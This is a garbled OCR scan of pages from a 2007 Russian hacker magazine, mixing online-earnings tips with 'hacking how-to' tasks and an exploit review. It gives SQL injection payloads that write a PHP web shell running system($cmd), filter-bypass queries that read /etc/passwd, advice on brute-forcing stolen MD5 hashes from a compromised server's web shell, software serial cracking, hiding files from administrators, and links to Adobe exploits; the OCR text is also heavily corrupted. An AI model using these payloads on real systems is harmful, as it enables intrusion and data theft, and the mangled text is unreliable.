РауРегРозІ: ( ѵѵѵѵѵѵ.раѵрегрозГсот ) 

— может прибавить в твой карман 
от $500 в месяц за то, что ты будешь 
писать статьи и обзоры для их 
спонсоров в своем блоге. 

Пеѵіеѵѵ Ме [ уууууу. геѵіеѵѵте.сот ) 

— если подойдешь им, будешь 
получать от 20 до 200 баксов за 
каждый пост! 

Сгеабѵе ѴѴеЫоддіпд ( ѵѵѵѵѵѵ.сгеаііѵе- 



ѵѵеЫоааіпа.сот ) — неплохая 
площадка для тренировки, готовая 
платить $225 в месяц, если будешь 
публиковать 7-1 0 толковых постов 
в неделю. 

Кучастию в ресурсах допускают- 
ся невсе,алишьте,укогоесть 
популярные блоги или ресурсы. 
Естественно, на английском языке. 



Платяточень щедро, но при этом 
писать рецензию нужно со знанием 
дела — так, чтобы это был искрен- 
ний отзыв и ни в коем случае не 
рекламная статья (которую распоз- 
нать проще простого). Если ты зна- 
ешь английский язык как родной и 
можешь интересно написать о чем 
угодно, то это твой шанс. 



Огромное количество информации можно почерпнуть, прочитав 
дневники так называемых «бомжей» — людей, которые задались целью 
заработать в Сети на квартиру. Уникальность этих проектов заключа- 
ется в том, что авторы постоянно делятся опытом, выкладывают конк- 
ретные цифры, скриншоты из партнерских панелей, сканы реальных 
чеков. Прочитав пару дневников, можно определиться с тем, стоит ли 
заниматься заработком в Сети или нет. А вот ссылки: 

Ьшз: //ЬотеІеззіпІаеѵ.ЫоезроГ.сот, Ьшз: //ЬошеІеззіптозсош.Ыоязро!:. 
сот, Ьир://1юте1е55ІпІ2Ііеѵ5к.Ыог5ро1:.сот, Ьир://Ьоте1е55Іп5рЬ. 
Ыо^зроСсот, Ьйр://Ьоте1е55ІпхарЪкоЪ.Ъ1о^5роі:.сот . 




Что надо: терпение, чтобы врубиться во все аспекты 5ЕО 



Вероятность быстро начать получать деньги: небольшая 



[ЦЭ Работа 
в области 8ЕО 

5Е0 (Зеагсб Епдіпе 
Оріітігаііоп] — продвижение/ 
раскрутка сайтов. Сейчас это 
чуть ли не самая перспективная 
область заработка в интернете, 
в которую вовлечены тысячи 
людей. Допустим, открылся 
интернет-магазин сноубордов. 
Открылся — а пользователи туда 
не идут. Тогда владелец добав- 
ляетсвой интернет магазин в 
поисковые сервисы и оказыва- 
ется... на десятой странице по- 
иска по слову «сноуборд». Толку 
от этого мало. Делать нечего 
— он обращается кЗЕО'шникам 
и платит большие деньги! 



5Е0 — дело сложное и подчас 
муторное: чтобы разобраться во 
всех тон костях, надо проработать не 
один год, прочитать кучу материа- 
лов и провести массу собственных 
экспериментов. Начать стоите 
основных понятийтипа боодіе РР, 
индекса цитируемое™, трафика. 
Важно понимать, что это не тупая 
возня с поисковиками, а кропотли- 
вый процесс работы с НТМІ_-кодом, 
структурой сайта, его содержимым 
ит.д. Опытные сеошники говорят 
о внешних и внутренних факторах. 
Грубо говоря, внешние факторы 
— это ссылки на сайте описанием 
продвигаемого запроса (например, 
игровые приставки — 5опу Р5Р), а 
внутренние — это количество пов- 



Первоначальные вложения: никаких 



торений ключевого слова на глав- 
ной странице, наличие ключевого 
слова в ТІТІ_Е, заголовках и т.д. О 
премудростях оптимизации можно 
прочитать на сайтах ЬНрѴЛогит. 
зеагсбепаіпез.ги . ЬНрУ/зеопеѵѵз.ги 
Еще существуют «черные» методы 
оптимизации, называемыетакже 
поисковым спамом. Суть их заклю- 
чается в создании огромного ко- 
личества липовых сайтов, которые 
генерятся по шаблону и ссылаются 
на рекламируемый ресурс. Таким 
образом, увеличивается позиция 



этого ресурса в поисковиках (с 
увеличением индекса цитирова- 
ния), а также трафик благодаря 
переходам посетителей с этих 
фейковых ресурсов. Такие ресурсы 
называются дорвеями. Есть огром- 
ное количество софта для создания 
дорвеев: самые продвинутые, как 
это водится, распространяются за 
денежку, менее функциональные 
— бесплатно. Самый большой 
список ресурсов для «черного» 
оптимизатора можно найти здесь: 
ѵѵѵѵѵѵ.Ыаскзео.ги .^с 
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Больше производительности? - Легко! 







Оііріііг Рвгсе 



ьше про Оиапшт Рогео... 

Названье серии м.этерилсжп! п п.гі т 

ГОЙГфИТ О НЫГ.-ГВДІ'І 
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П Р О ГЛ С Т 5 1 р О Е .7 Н И Эі А I' ОДИрбрЗННЬвМ 
лучшими ово|эклркорлм.і миря. 

Ѵ.чнаП фопыьс О О.іяііііі] . ^ізі к 

ил едите 
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Базу Наск} 

ВЛАДИМИР «ООТ.ЕНН» САВИЦКИЙ ЛЕОНИД «СП@ѴѴІ-ЕВ» ИСУПОВ ЛЕОНИД «ВОЮ» ОТРОЙКОВ 

/ КАІРОГЫГЕ@ВК.П1І / / СПАѴѴІ.ЕПНАСК@ПАМВІ.ЕП.Пи / / ПОІО@МАИ..ГШ / 




ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХ ВЕЩЕЙ 




ЗАДАЧА: 



^ОРИГИНАЛЬНО, ТАК СКАЗАТЬ, ПО-ХАКЕРСКИ ПО- 
ЗДРАВИТЬ ДРУЗЕЙ С НОВЫМ ГОДОМ. 

РЕШЕНИЕ: 



Напишем прогу, основными действиями которой будет работа с реестром, а 
точнее, создание и изменение его ключей и ихзначений. 

1. Приветствие. С чего начинается работа на компе нашего друга? Конечно 
же с загрузки форточек! Давай выведем вступление к нашему поздрав- 
лению в окошке перед входом в систему. Открываем раздел реестра 

Н КЕѴ_І_0 С А І__М АС Н I N Е\5оІ1ѵѵа ге\М і с гозо1і:\\Л/і п 6 оѵѵз ЫТ\С и гге п*Ѵе гзі о п\ 
ѴѴіпІодоп, создаем там строковый параметр БедаИЧобсеСарбоп, присваи- 
ваем емузначениетипа «С Новым годом!». Далее создаем строковый 
параметр с именем І_едаІІ\ІобсеТехІ и хорошим юморным поздравлением в 
качестве значения. 

2. Новогодняя открытка. Нет ничего приятнее, чем получить красочную от- 
крытку на праздник. Рисуем, пишем, фотошопим (по желанию] и сохраняем 



получившуюся картинку в формате Ьгпр. Далее помещаем свое творение на 
рабочий стол, для чего в разделе реестра НКЕѴ_СІІРРЕМТ_1)5ЕВ\СопІгоІ 
РапеІ\0е5кІор изменяем значение ключа ѴѴаІІрарег на полный путьдо 
своего рисунка. 

З.Оченьдосадно, если нашу открытку будут закрывать десятки ярлыков, 
висящих на рабочем столе. Очистим стол, чтобы было лучше видно позд- 
равление: в разделе Н К ЕУ_С I) Р Р Е N Т_0 5 Е Р\5 оІЕѵѵа ге\ М і с го 5 о ^1;\\Л/ і п сі о ѵѵз\ 
СиггепіѴег5Іоп\РоІісіе5\ЕхрІогегсоздаем параметр типа йѴѴОРО с именем 
ЫоОезкІор и значением 1 . 

4. Праздничный Ехріогег. Для новогоднего настроения нарисуем 
падающий снег и поместим его как фон на панельки Ехріогег'а. Для 
этого сохраним изображение снега в формате Ьгпр, откроем ключ 
НКЕУ_СІІРРЕМТ_ІІ5ЕР\5о^;\л/аге\Місго50І : 1:\Іп1:егпеІ ЕхрІогег\ТооІЬаг\ 
и создадим в нем строковый параметр с именем ВаскВіітар и полным 
путем до картинки в качестве значения этого параметра. Не забываем 
программным путем открыть какое-нибудь окошко Ехріогег’а, чтобы 
показать эту красоту другу. 

5. Для того чтобы не сильно перетруждать друга просмотром нашего поздравле- 
ния, можно красиво уйти. Исполняем директиву командной строки «зЬи1;сІоѵѵп 
-5 -Ы 20 -с "С новым счастьем!"», которая без лишних вопросов покажетдругу 
сообщение «С новым счастьем!», выведетсчетчик на 20 секунд и выключит комп, 
в. Не забываем, что все эти действия нужно скомпоновать в один экзеш- 
ник, называющийся, к примеру, НарруЫеѵѵУеаг.ехе. 

Воттак можно оригинально поздравить друзей с Новым годом. Самое 
главное — это творческий подход :). 





ЗАДАЧА: 



] РАСШИФРОВАТЬ ДОБЫТЫЙ М05-ХЭШ. 

РЕШЕНИЕ: 



Сейчас в большинстве случаев пароли юзеров хранятся в БД в крипто- 
ванном виде. Обычно в этих целях программеры используют распростра- 



ненный алгоритм шифрования ІѵШ5. Именно поэтому зачастую возникает 
геморрой с брутом чужих М05-хэшей, стыренных столько что взломанного 
сервера :). Объясняю коротко, четко и доходчиво: для брута подобного хэша 
есть три основных пути: 

1 ) проверка требуемого хэша на различных раззѵѵогсізсгаск-порталах, 

2) брутс использованием постороннего софта, 

3) брутсобственными силами. 

I. Первый способ весьма прост— надо пробежаться по нескольким 
крупным раввѵѵогсізсгаск-ресурсам в поисках своего хэша. Пореко- 
мендовать могу б11р://ра55сгаскіпа.ги — один из лучших се рви со в по- 
добного рода. Но результат здесь напрямую зависит от расположения 
звезд на небе и порой оставляет желать лучшего (нотебе, возможно, 
повезет больше :]]. 

II. Про брутс помощь постороннего софта я и говорить не хочу. Во-первых, 
РэбзѵѵогсібРго и аналогичные емуутилы жрут ресурсы каксвинья помои, а 
во-вторых, не у каждого есть ломаные \л/іп-дедики, которые можно грузить 
24 часа в сутки. 

III. Остается третий, последний вариант — брутсобственными силами. Итак, 
рассмотрим наши действия по порядку: 

1. Выбираем из заначки/ломаем/просим у знакомого/добываем другими 
путями любой веб-шелл (на сервере должен обязательно стоять РНР). 

2. Пишем нехитрый Мйб-брутер на РНР (его исходник ищи на нашем ОѴО). 
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3. Ищем на сервере с веб- шеллом диру с правами 777 (например, Дтр) и 
заливаем наш брутер с расширением рЬр. 

4. В тот же каталогаплоадим следующие файлы: сПсЕМ — словарике паро- 
лями, ЬавЬв. Іхі — листе М05-хэшами. 



5. Запускаем наш брутер и спокойно идем пить пиво :). 

Как видишь, все предельно просто. Только помни, что наш скрипт однопо- 
точный, а следовательно, работаетон не с первой космической скоростью. 
Тем не менее порой это самый оптимальный вариант. 



№3 




Программа приняла серийный номер по 6е1:ѴѴіпсІоѵѵТех{А 

^іГЛІГЛ ОСТАНОВКА ПРОГРАММЫ НАТОЧКЕ, В КОТОРОЙ ПРО- 
ИСХОДИТ ПРИЕМ СЕРИЙНОГО НОМЕРА ОТ ПОЛЬЗОВАТЕЛЯ. 

РЕШЕНИЕ: 

Что необходимо для того, чтобы прерваться втребуемом месте? Во-пер- 
вых, нужно знать, какая АРІ-функция вызывается для извлечения данных 
из текстового поля. Обычно эту задачу выполняют функции ОеіѴѴіпсІоѵѵТехіА 
и беЮІдІІетТехіА. Если втвоем случае это нетак, можно воспользовать- 
ся следующим методом: определяем тип объекта, содержащего текст, с 
помощью какого-либо «оконного шпиона», например ІпцЗо^ѴѴіпБсаппег, и 
ищем в любом справочнике функции, работающие с этим типом объектов. 
Попробуем разобраться, как остановиться в отладчике точно на процедуре 



№4 




кШДІГЛ ПОЛУЧИТЬ ВЕБ-ШЕЛЛ НА СЕРВЕРЕ ПРИ ПОМОЩИ 501.- 
Ш.ІЕСТІОМ. 

РЕШЕНИЕ: 

Часто бываеттак, что одного инъекта нам мало :). Иногда базу слить 
проблемно, а иногда и сервером порулить очень хочется. И в том, и 
в другом случае все упирает в получение полноценного веб- шелл а 



приема серийного номера, на примере программы СиІеРТР Рго 8.0.2. 

1 . Открываем программу (в нашем случае СиіеРір Рго]под отладчиком. 

2. РІажимаем <АИ:-Е> для выбора отлаживаемого файла (сиіе^ррго.ехе). 

3. Комбинацией <АИ-Р1 > открываем окошко командной строки (плагина) 
и вводим в него команду Ьрх ОеЕѴѴіпсІоѵѵТехЕА (эта команда ставитточки 
останова на абсолютно все вызовы беіѴѴіпсІоѵѵТехіА]. 

4. Долго жмем <5ЫК-Р9>, пока программа не запустится (при этом срабаты- 
вает несколько точек останова на местах вызовов ОеМ/іпсІоѵѵТехТА, но нас 
это не интересует). 

5. Пытаемся открыть свернутое окно нашей программы, тут же срабатыва- 
етеще одна точка останова. Она нам не нужна, поэтомуликвидируем ее, 
нажав <Р2> в окне ОІІуйЬд. 

6. Снова давим <5ЬИі:-Р9> и опятьпробуем открытьокно программы, раз- 
вернув его из трея. Ріа этот раз все получается без проблем. 

Т.Жмем кнопку Еп^егБегіаІ ІЧитЬег— возникнет исключение. Обойдем его 
с помощью <БЫД-Р9>. После этого уберем ненужную нам точку останова по 
адресу 00593008, нажав <Р2>, и опять запустим программу (<5ЫТС-Р9>). 

8. Мы удалили ложныеточки останова, перед нами окно для ввода 
серийного номера. Введем что-нибудь и кликнем «Далее». Мы достиг- 
ли цели! Программа приняла сери йн и к при помощи вызова функции 
6еіѴѴіпсІоѵѵТех1:А: 

005983Р6 САЬЬ ШОКБ РТЕ БЗ : [<ШЗЕК32 . ОеШіп<аотеТехЪА>] 

Не пугайся кажущейся сложности этой задачи. Будетлегче разо- 
браться, если ты усвоишь главный принцип: ставь точку останова 
на функцию, а затем запускай программу, отключая все ненужные 
точки останова, пока отладчик не перестанет выдавать «ложные 
срабатывания». 

Первый шагво взломе программы сделан — локализованото место, где 
принимается серийный номер. Делотеперьза разбором алгоритма про- 
верки его верности. Об этом написано множество статей, в том числе и 
моих, поднимай архив «Хакера» :). 

на сервере. Сразу скажу, что для успешного исхода операции нам 
потребуются права на запись и полный путь до веб- каталога. 

1 . Если ито и другое у тебя есть, смело вбивай в адресную строку браузера 
кверю вида: 

ЬЦЦр: //зіЬе . сот/іп(1ех.рЪр?і<і=-1+ипіоп+зе1ес{:+іш11 , 'уои 
г_сос!е ' , пиіі ,пи11 ,пи11 ,пи11+бгош+и8ег8+іпЬо+оиЬбі1е+ ' / 
Ьоте/мѵтм/ітд/зЪеІІ .рЪр ' /* 

Здесь/Ьоте/ѵѵѵѵѵѵ/ітд/— путь до диры с чмодом 777, а вбеІІ.рЬр — имя файла, в 
который мы пишем свой РНР-код. Учти, что если файл в б е И. р Ир уже существует 
на сервере, то запись не произойдет, а мускул вывалит сообщение об ошибке. 

2. Под уоиг_сосІе’ может скрывать все что угодно, например: 

<? 

зузбет ( $стсІ) ; 

?> 

Теперь достаточно обратиться кжертве по линку: 

ТЩСр: //зіЬе . сот/ішд/зЬеІІ .рЬр?стсі=і<і 

3. Наслаждаемся. Ведь веб-шелл у нас в руках :). 



ХАКЕР 12 /108/ 07 



► 051 



взлом 



>> 





3 *двгОяІія( ( Ъп,гИіт . №ідо ;іп/ 




нет* «Ф5 ѵрля пц*, Сывк? міт( 5 * ь г*гг -цс н*п ілдачп йгф* йсл&вй еи«’ 




*.:■ * Щ'Ишінф Щ ёрііг Гчіг 5 *# Ас гегі.і * з.^гчіу іігіпц -ч ік лг *.• і 



Обходим фильтрацию в ■мши 



АДАЧА: 



Э ОБХОД ФИЛЬТРАЦИИ В МУБОЬ ПРИ РЕАЛИЗАЦИИ 501.- 
ШЕСТІОЫ. 

РЕШЕНИЕ: 



Не удивлюсь, если при реализации инъектов ты в 50% случаев 
сталкиваешься с фильтрацией символов в мускуле. Проблема обхода 
подобного рода защиты известна давно, воттолько как ее решать, зна- 
ют до сих пор немногие. Чаще всего траблы возникают при передаче 
уязвимому скрипту нашего запроса к СУБД. Разберемся в деталях на 
повседневном примере. 

Допустим, мы имеем баг по адресу: 



функцию сНагП, которая принимает АЗСІІ-значения символов. Верхний 
запрос при этом будет и меть та кой вид: 

ЬДЦр: //зі1:е . сош/іп<іех.рЪр?ісІ=-1+ипіоп+зе1есі:+1 , 2 ,3 ,СН 
АН (85,83,69,82,40,41) ,5,6/* 

Аналогичным образом можно читать файлики с помощь ІоасМіІе(): 

ЬДДр: //віЬе.сот/іп<1ех.рЪр?і(1=-1+ипіоп+зе1есЪ+1,2 ,3 ,ЬО 
АБ_РІБЕ(сЪаг (47,101 ,116,99,47 ,112,97 ,115,115,119,100) 

) ,5,6/* 



ІіДДр: //зіДе . сот/іпсІех.р]ір?іс1=123 ' 

То есть, какты видишь, инъекту подвержен скрипт іпбех.рбр через 
параметр ісі. Но, подобрав поля, мы обнаруживаем, что выдрать инфу из 
базы не так-то просто — присутствует фильтрация, а значит, обычный 
запрос не пройдет: 

ЬЦЦр: //зіЬе . сот/іп(Зех.рЪр?і(3=-1+ипіоп+5е1есб+1 , 2 ,3 ,из 
егпате , 5 , б+бгош+изегз/* 

При таком раскладе поставленную задачу придется решать следующим 
образом: 

1 . Необходимо точно удостовериться в наличии фильтрации, а также 
прав юзера, от имени которого ты выполняешь запросы. Зачастую, 
особенно при работе со слепыми инъекциями, сходу тяжело отличить 
отсутствие прав доступа к таблице/базе от наличия фильтрации, так как 
результат ошибочного выполнения запроса всегда будет один и тотже 
(например, пустая пага). 

2. Следует попробовать за юзать всеми нами любимые функции 
АЕ5_ЕЫСНУРТ() и АЕ5_0ЕСРѴРТ(). Делается это так: 

ІіДДр: //зіДе . сот/іпсіех.р]ір?ісІ=- 

і+ипіоп+зеіесд+і ,2,3, АЕЗ_БЕСКУРТ ( АЕ5_ЕЫСЕУРТ (Б5ЕК. ( ) , 0 
х71 ) ,0x71) ,5,6/* 

Эта манипуляция кодирует передаваемое значение, в большинстве 
случаев обеспечивая успешный обход фильтрации :). 

3. Еще один возможный вариант — зачарить часть квери, используя 



Но вбивать каждый раз АЗС II -значения символов ручками — дело не- 
благодарное, поэтому накатаем жизненно важный скриптик на Перле: 

# ! /изг/Ьіп/регІ 

@с1і_1іпе= 1 р 1 , ' а ' , 

' з ' , ' з 1 , ' Ѵ7 ' , ' (1 ' ) ; 

$1і1е = ' С : \ сЬ.аг з . бхб ' ; 
ореп(БАТА, "» $Еі1е"); 
бог($і=0;$і <= $#сЬ._1іпе; $і++) { 

$с]іаг = огсі $сЬ_1іпе [$і] ; 
ргіпр БАТА "$сЬаг, " ; 

} 

СІОЗѲ БАТА; 

4. Последний распространенный случай из нынешней серии — фильт- 
рация символа «+». Многие при виде подобной картины быстренько 
сворачивают свою деятельность, переключаясь на поиски более 
«сговорчивых» вариантов, а зря :). Обойти такую фильтрацию зачастую 
проще простого: 

ЬДДр : //зіЬе . сош/іп(іех.р1ір?ісЗ=-1/**/ипіоп/**/зе1есЦ/** 
/1,2,3 ,изегпаше, 5 , 6/**/бгот/**/изегз/* 

Другими словами, мы изменили «+» на «/**/» — пустой комментарий, а 
мускул наживку с удовольствием проглотил :). 

Существуют и более сложные случаи, о которых мы писали и будем 
писать (листай подшивку ][]. Кроме того, помни, что методы по-настоя- 
щему хороши, когда их комбинируешь. 




.ЛІіГЛДШ ЗАШИТИТЬ свои данные, чтобы их не потер ка- 
кой-нибудь ЗЛОЙ АДМИН. 



РЕШЕНИЕ: 

Для защиты данных от админе ко го беіеіе заюзаем вин до вое 
ограничение на имя файла. Всем известно, что символы «:», «|», 
«<»,«>», «?», «*», «.» являются служебными в ѴѴіпсіоѵѵб, однако 
существует несколько способов, позволяющих создавать файлы 
с некорректными именами, используя эти символы. Одним из них 
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Защищаем свое файло 



\ѵзргіп1:і: (1:тр, "%з.\\" , 

"гезиіі: . " ) ; 

4 . Зададим новое имя для файла 
іезихі. 

МоѵеРіІе ( "ЬезЬ . ЬхЬ " , Етр) ; 

5 . Проверим результат: при попытке 
удаления файла из Ехріогег’а ѴѴіпсІоѵѵз 
выдает сообщение об ошибке: «Не 
удается удалить файл. Не удается про- 
извести чтение из файла или с диска». 
Пробуем удалить через консоль: 

сіеі гезиіі: . 

Не удается найти файл гезиіі: . 

в. Ура! Мы создали неудаляемый 
файл. Воттолько теперь нам самим 
нужно получить к нему доступ. Вос- 
пользуемся ІІЫС-путями, для чего 
добавим символы «\\?\» перед при- 
вычным нам полным путем до файла: 

МоѵеРіІе ( "\\\\?\\с: \\ітр\\ 
оиЕриС . " , "СезЕ . Ьхі: " ) ; 



мы и воспользуемся. В результате получим неудаляемый, неот- 
крываемый, некопируемый и непереименовываемый (во, блин!) 
файл. 

1 . Если использовать МоѵеРіІе, Сору Рі Іе и некоторые другие функции 
работы с файлами, при передаче названия в качестве параметра 
необходимо в его конец добавить символы «А». Таким образом, мы 
сможем задавать любое некорректное имя. 

2 . Создадим приложение на С++ (или любом другом языке) и переимену- 
ем файл ІезСМтак, чтобы ѴѴіпсІоѵѵз не могла с ним нормально работать 
(добавим точку в конец имени). 

3. Добавим кзаведомо нечитаемому названию «ге5и1і.» символы «А» и 
поместим получившееся в переменную Ітртипа сбаг*. 



После выполнения этой функции мы 

получили исходный файл ІезЕМ, к которому можно спокойно обращаться 
в Винде. 

7. Все бы хорошо, но нашу прогу так неудобно использовать! Сделаем 
ее более дружелюбной по отношению к юзеру (ни в коем случае не 
к админу!) :). Пусть при запуске пользователю будет предлагаться 
на выбор одна из команд: создание файла с некорректным именем, 
возвращение привычного Винде имени файла и удаление файла с 
некорректным именем. Также сделаем интерфейс для использования 
нашей проги в различных батниках: при запуске будут передаваться 
два параметра — исходное название файла и конечное, которое так не 
любит Винда. 

Воттеперь местный админ уж точно не сможет помешать тебе осущест- 
вить твои коварные планы. 




ЗАДАЧА 



2 ОТЛАДИТЬ ПРОГРАММУ, КОТОРАЯ ОБРАЩАЕТСЯ К 
УСТРОЙСТВУ, НАХОДЯЩЕМУСЯ НА ВИРТУАЛЬНОМ СОМ-ПОРТУ 
УДАЛЕННОГО КОМПЬЮТЕРА. 

РЕШЕНИЕ: 



1. Скачиваем (например, здесь: Ьир://50Й.50Йобгот.ги/ар/р6291 .збіті ) 
или берем с нашего диска программу ІР->Сот, которая предназначена для 
маппинга удаленного порта на существующий локальный через интернет 
или локальную сеть. 

2 . Во фрейме Сот Рогі выбираем свободный локальный порт, на который 
будетмаппироваться удаленный, например СОМ 5. 

3. Во фреймеТСР/ІР Бегѵісе вводим ІР-адрес удаленного компьютера 

в поле Іпіюгідсе и номер ТСР/ІР-порта, который открыт для передачи на 
удаленном компьютере (например, 80), в поле Рогі ЫитЬег. 

Этот метод хорош тем, что позволяет получить быстрый доступ кудален- 
н о му устройству, находящемуся как в локальной сети, так и на большом 
расстоянии, используя протокол ТСР/ІР^с 
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КРИС КАСПЕРСКИ 



0Б30РЭКСПЛ0ИТ0В 



АСКОВАТ 

РЕАйЕР: 

V I УДАЛЕННОЕ 
ВЫПОЛНЕНИЕ КОДА 
ЧЕРЕЗ МАНТО 



>> Вгіеі 



| 20 сентября 2007 
года хакер по кличке рбр (рбр. 
дписііііепісідоодіетаіі.согп) обна- 
ружил серьезную дыру в АсгоЬаІ 
Реабег’е, обнародовав ее в своем 
блоге ( ѵѵѵѵѵѵ.аписіІігеп.ога/ЬІоа/ 
Обаѵ-рсіі-рѵѵпз-ѵѵіпсіоѵѵз ). АбоЬе 
отреагировала на эту предъяву 
лишь 22 октября (притом что первый 
публичный эксплойтпоявился 16 
октября). А на следующий день, 23 
октября, корпорация Зутапіес из- 
ловила живого червя Т гоі а п . Р і сі і еі 1 . 

А (он же ЕХРІ__РЮІЕР.В [Тгепб], 
он же Тгоі/РОРех-А [Борбоз]), 
написанного китаянкой Еііа Ріогіо 
и распространяющегося по элект- 
ронной почте вместе с вложениями 
іпѵоісе.рбі, уоиг ЬіІІ.рсіР, ЬіІІ.рсН 
и зіаіетеі.рсіі (смотри зѵтапіес. 
сот/Ьизіпезз/зесигіІѵ гезоопзе/ 
ѵѵгііеи р.ізр?сіосісі=2007- 102310- 









^амыи «правильный» лозунг! 



3513-99&1аЫб=2 и зѵтапіес. 
сот/епіегргізе/зесигііѵ гезоопзе/ 
ѵѵеЫоа/2007/1 0/ѵѵЬеп осібз аііаск 
аааіп.ЫтІ ). Это довольно необыч- 
ная дыра, возникающая на стыке 
АбоЬе АсгоЬаІ Неабег’а с МБ ІЕ7 в 
процессе определения приложения, 
ответственного за обработку прото- 
кола таіііо. Чтобы форсировать ав- 
томатический запускисполняемого 
приложения, достаточно создать: 

« < </1) Р I ( т а і Но :ІезІ% . ./. ./. ./. ./. ./. ./. ./. ./ 
ѵѵ і п б оѵѵз/зу зі е т 3 2/с а Іс . е х е » . с т б ) / 
5/1)РІ>>». И тогда наХР|5егѵег2003/ с 
ІЕ7 при локальном открытии рбі-до- 
кумента запустится калькулятор без 
каких бы то ни было дополнитель- 
ных действий со стороны жертвы 
(кликать по ссылке необязательно). 
Открытие документа через рсІР- 
АсІіѵеХ ріид-іп обойти сложнее: 
зесІІ5Із.ога/ЬиаІгад/2007/Осі/0213. 
Ыті . Более подробную информа- 
цию о дыре можно получить на \л/\л/\л/. 
зесигіІѵІосиз.сот/Ьіб/25748/ . ѵѵѵѵѵѵ. 
зѵтапіес.сот/аѵсепіег/аііаск зіаз/ 
з22634.ЫтІ и ѵѵѵѵѵѵ.зѵгпапіес . сот/ 



ТЕКУЩИЙ ОБЗОР ПОСВЯЩЕН КОМПАНИИ АБОВЕ, В ПРОДУКТАХ КОТОРОЙ ОБНА- 
РУЖЕНО МНОЖЕСТВО ЗНАМЕНАТЕЛЬНЫХ ДЫР, ДОПУСКАЮЩИХ ВОЗМОЖНОСТЬ 
УДАЛЕННОГО ЗАХВАТА УПРАВЛЕНИЯ, ЧЕМ УЖЕ С УСПЕХОМ ВОСПОЛЬЗОВАЛИСЬ 
ЧЕРВИ, ВЫЗВАВ ОЧЕРЕДНУЮ ВОЛ НУ ЭПИДЕМИИ. 



зесигііѵ гезропзе/ѵиІпегаЬіІіІѵ. 
ізо?Ьіб=25748 . 



>> ТагдеІ5 



Уязвимости подвержены только 
системы с ХР|5егѵег 2003/1 Е7 и 
стандартным почтовым клиентом 
по умолчанию. Версия АсгоЬаІ'а 
не имеетзначения, багкоситвсе 
билды подряд отЗ.х до 8.x. 



>> Ехріоіі 



Публичная версия эксплойта, 
запускающего калькулятор, вы- 
ложена на зесигііѵ.іебога-іюзііпа. 
сот/0сІаѵ/рсИ : /рсИ : рос.рбі . а рядом 
с ней лежит и ее описание: зесигііѵ. 
Іебога-ЬозІіпа.сот/Обаѵ/рбІ/ 
рсИ 1 рос.іхі . Все это добро на всякий 
случай скопировано на мой сервер: 
бІІрУ/пегиті.ога.ги/зоигіг/Иаск/ 
{зб| рос.7г . 



>> Зоіиііопз 



Пользователи АсгоЬаІ Веабег’а 
версий 7.х-8.х могут уста но вить 
заплатку от АбоЬе или, следуя ради- 
кальным предписаниям последней, 
отключить обработку протокола 
таіііо в реестре: ѵѵѵѵѵѵ.абоЬе.сот/ 
5иррогі/5есигіІѵ/ЬиІІеІіпз/аР5Ь07- 
18. Ыті . Остальным же рекомен- 
дуется просто установить любой 
другой мыльник, назначив его 
почтовым клиентом поумолчанию. 



АРОВЕ РЬАЗН 
РКАѴЕК: 

V Яш УДАЛЕННОЕ 
ВЫПОЛНЕНИЕ КОДА 



>> Вгіеі 



15 июля 2007 года 
клевые китайские хакеры Біеіапо 
ОіРаоІа, Еііа Ріогіо (создательница 
вируса Тгоіап.РібіеІ.А) и біогдіо 
Еебоп из РЬ4пЮт БесигіІуТеат 
( ѵѵѵѵѵѵ.рЬ4пі0т.ога ) лихо подло- 
мали АбоЬе Ріазб Ріауег 9.0.45.0, 
используемый кучей браузеров (в 



том числе и на игровых консолях!). 

А наши братья по разуму — Іиоіио 
иуипзби — заточили под это дело 
нехилый эксплойт: ѵѵѵѵѵѵ.ісѵіііе. 
пеіА/ипзЬи/аІІасЬтеп1.рІ~ір?іб=5 
с збеіі -кодом внутри. История 
получила продолжение 1 7 июля, 
когда Р1епке37 обнаружил множе- 
ственные зідпеб/ипзідпеб ошибки 
переполнения в Иѵ-парсере, а 
уипзби заточил под это дело еще 
один эксплойт. 31 октября эхо атаки 
докатилось и до Оперы, а точнее, до 
АбоЬе РІазЬ Ріауег’а, работающего 
в ее контексте. Суть бага такова: 
парни из АбоЬе решили копировать 
буфер двойными словами (это быст- 
рее) и потомутщательно проверили 
наличие на кассе по меньшей мере 
8 байт, а вото большей мере впо- 
пыхах как-то позабыли, позволив 
инструкции ВЕР М0Ѵ50 чесать 
по куче во весь опор. А что у нас 
интересного в куче? Ну, например, 
указатели на виртуальные функции, 
одна из которых вызывается вслед 
за переполнением :). 



>> Тагдеіэ 



Уязвимость подтверждена в 
следующих версиях РІазЬ Ріауег’а: 



7.0. 69.0. 8.0.34.0. 9.0.28.0. 9.0.31.0, 

9.0. 45.0, а также некоторых других. 
Затронуты практически все плат- 
формы: ѴѴіпбоѵѵз, І_іпих, Мае 05 X и 
даже игровая консоль Ыіпіепбо ѴѴіі! 



>> Ехріоіі 



Реально работающий эксплойт 
(вместе с объяснениями принципов 
его работы) лежит на раскеізіогт. 
ІіпихзесцгіІѵ.сот/0707-ехрІоіІз/ 
07162007-ИазЬ Иѵ 9.0.45.0 ехр.гір . 
а на ѵѵѵѵѵѵ.зесигііѵіосиз.сот/баіа/ 
ѵиІпегаЬіІіІіез/ехрІоіІ5/24856.2Ір 
— его зеркало. 



>> Боіиііоп 



Установить обновление от АбоЬе 
( абоЬе.сот/зиррогі/зесигіІѵ/ 
ЬиІІеІіпз/ар5Ь07-1 2.Ыт І) или же от 
конкретного производителя бра- 
узера, например для Оперы: ѵѵѵѵѵѵ. 
орега.сот/зиррогі/зеагсЬ/ѵіеѵѵ/868 . 

/Ч А РН0Т05Н0Р: 
С МНОЖЕС- 
и V ТВЕННЫЕ 
ПЕРЕПОЛНЕНИЯ 
БУФЕРА 



>> Вгіеі 



1 0 октября 2007 года 




Под ѴѴ2К дыра в АсгоЬаІ’е не функционирует 



► 054 



ХАКЕР 12 /108/ 07 














взлом 




ь ЦТ Г* >-#тН:| ы ~ « 

I іТіПр РТ| 1 ■* • 

Т^^*І«-ч*И+*?С7| ПДПіи ЛмйчгМьі» 
Чь іиііі Г м чі ЮС 



ч ,н і \ і р р*а . -дм іи ■и>‘ 

кін™і»і. 7.і :.ц.у- »“Л*Н І.іЛІГ-Г 

и*_ инв 1 . Ьшгг* Т. ШшГШ * в/И к У ъ к ги 
■п*»Ѵ«* І-Р— ч « 24 * \ ш*т жГ*Я 



Эксплойт от Магзи в РАР’е 



■ Г-ЫИГІ- Г-ЬКИи. 

А клево быть китайцем! 



- * ті іі ч 



хакер Магзи (МагзиріІатіроѵѵаЙ 
Ьоітаіііг) обнаружил очередную 
ошибку переполнения буфера 
